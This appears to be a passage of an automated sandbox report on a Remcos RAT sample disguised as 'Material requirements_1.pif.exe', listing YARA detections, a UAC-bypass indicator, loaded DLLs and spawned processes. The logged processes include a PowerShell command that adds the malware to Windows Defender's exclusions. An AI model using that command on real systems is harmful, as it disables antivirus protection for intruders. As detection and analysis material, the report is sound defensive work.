                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: Material requirements_1.pif.exe PID: 6648, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: Material requirements_1.pif.exe PID: 5420, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.Material requirements_1.pif.exe.70b0000.4.raw.unpack, .cs, Large array initialization: array initializer size 37142
                Source: 0.2.Material requirements_1.pif.exe.2d94fd0.0.raw.unpack, .cs, Large array initialization: array initializer size 37142
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Process Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_004158B9 ExitWindowsEx, LoadLibraryA, GetProcAddress
                Source: C:\Windows\System32\wbem\WMIADAP.exe, File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
                Source: C:\Windows\System32\wbem\WMIADAP.exe, File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
                Source: C:\Windows\System32\wbem\WMIADAP.exe, File created: C:\Windows\inf\WmiApRpl\
                Source: C:\Windows\System32\wbem\WMIADAP.exe, File created: C:\Windows\inf\WmiApRpl\WmiApRpl.h
                Source: C:\Windows\System32\wbem\WMIADAP.exe, File created: C:\Windows\inf\WmiApRpl\WmiApRpl.ini
                Source: C:\Windows\System32\wbem\WMIADAP.exe, File created: C:\Windows\inf\WmiApRpl\0009\
                Source: C:\Windows\System32\wbem\WMIADAP.exe, File created: C:\Windows\system32\PerfStringBackup.TMP
                Source: C:\Windows\System32\wbem\WMIADAP.exe, File deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_02D0D5BC
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_04DA0040
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_04DA3DF0
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_05326F40
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_0532782C
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_05320006
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_05320040
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_05326F1F
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_05323F54
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07123698
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07124548
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07124210
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07120040
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07120F00
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_0712F650
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_0712F641
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_0712368B
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07125508
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07124538
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_071254F8
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07124201
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_071232DB
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_071232E0
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07120006
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07123070
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07123080
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_0712DFA8
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07120E10
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07121E10
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07121E00
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07120D8A
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07126DD1
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07126DE0
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07122CD8
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_07122CC9
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_0712DB70
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 0_2_0712DB60
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_004520E2
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_0041D081
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_0043D0A8
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_00437160
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_004361BA
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_00426264
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_00431387
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_0043652C
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_0041E5EF
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_0044C749
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_004367D6
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_004267DB
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_0043C9ED
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_00432A59
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_00436A9D
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_0043CC1C
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_00436D58
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_00434D32
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_0043CE4B
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_00440E30
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_00426E83
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_00412F45
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_00452F10
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_00426FBD
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: String function: 00401F66 appears 50 times
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: String function: 004020E7 appears 41 times
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: String function: 004338B5 appears 41 times
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: String function: 00433FC0 appears 55 times
                Source: Material requirements_1.pif.exe, 00000000.00000002.2091635478.0000000007430000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameMontero.dll8 vs Material requirements_1.pif.exe
                Source: Material requirements_1.pif.exe, 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMontero.dll8 vs Material requirements_1.pif.exe
                Source: Material requirements_1.pif.exe, 00000000.00000002.2084001859.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameFGMaker.dll2 vs Material requirements_1.pif.exe
                Source: Material requirements_1.pif.exe, 00000000.00000002.2082802234.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs Material requirements_1.pif.exe
                Source: Material requirements_1.pif.exe, 00000000.00000002.2091086276.00000000070B0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameFGMaker.dll2 vs Material requirements_1.pif.exe
                Source: Material requirements_1.pif.exe, Binary or memory string: OriginalFilenameVpNo.exeD vs Material requirements_1.pif.exe
                Source: Material requirements_1.pif.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 7.2.Material requirements_1.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 7.2.Material requirements_1.pif.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.Material requirements_1.pif.exe.4bd1360.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000000.00000002.2085360739.000000000474E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: Material requirements_1.pif.exe PID: 6648, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: Material requirements_1.pif.exe PID: 5420, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Material requirements_1.pif.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, EXjeaLC6h752HH7SeQ.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, EXjeaLC6h752HH7SeQ.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, HO6g8FnXFx6pGwv4w4.cs, Security API names: _0020.SetAccessControl
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, HO6g8FnXFx6pGwv4w4.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Material requirements_1.pif.exe.7430000.7.raw.unpack, HO6g8FnXFx6pGwv4w4.cs, Security API names: _0020.AddAccessRule
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, HO6g8FnXFx6pGwv4w4.cs, Security API names: _0020.SetAccessControl
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, HO6g8FnXFx6pGwv4w4.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, HO6g8FnXFx6pGwv4w4.cs, Security API names: _0020.AddAccessRule
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, HO6g8FnXFx6pGwv4w4.cs, Security API names: _0020.SetAccessControl
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, HO6g8FnXFx6pGwv4w4.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Material requirements_1.pif.exe.4b14b40.3.raw.unpack, HO6g8FnXFx6pGwv4w4.cs, Security API names: _0020.AddAccessRule
                Source: 0.2.Material requirements_1.pif.exe.4a58320.2.raw.unpack, EXjeaLC6h752HH7SeQ.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine, Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@11/16@0/1
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_00416AB7 GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, GetLastError
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_0040E219 GetModuleFileNameW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, CloseHandle, CloseHandle
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_0041A64F FindResourceA, LoadResource, LockResource, SizeofResource
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Code function: 7_2_00419BD4 OpenSCManagerW, OpenServiceW, CloseServiceHandle, StartServiceW, CloseServiceHandle, CloseServiceHandle, CloseServiceHandle
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Material requirements_1.pif.exe.log
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2992:120:WilError_03
                Source: C:\Windows\System32\wbem\WMIADAP.exe, Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
                Source: C:\Windows\System32\wbem\WMIADAP.exe, Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
                Source: C:\Windows\System32\wbem\WMIADAP.exe, Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
                Source: C:\Windows\System32\wbem\WMIADAP.exe, Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Mutant created: \Sessions\1\BaseNamedObjects\Rmc-0PJCBG
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k0diqpim.ksk.ps1
                Source: Material requirements_1.pif.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Material requirements_1.pif.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: Material requirements_1.pif.exe, ReversingLabs: Detection: 68%
                Source: Material requirements_1.pif.exe, Virustotal: Detection: 63%
                Source: unknown, Process created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Process created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Process created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Process created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Material requirements_1.pif.exe"
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Process created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Process created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Process created: C:\Users\user\Desktop\Material requirements_1.pif.exe "C:\Users\user\Desktop\Material requirements_1.pif.exe"
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Section loaded: version.dll
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exe, Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Material requirements_1.pif.exeSection loaded: slc.dllJump to behavior
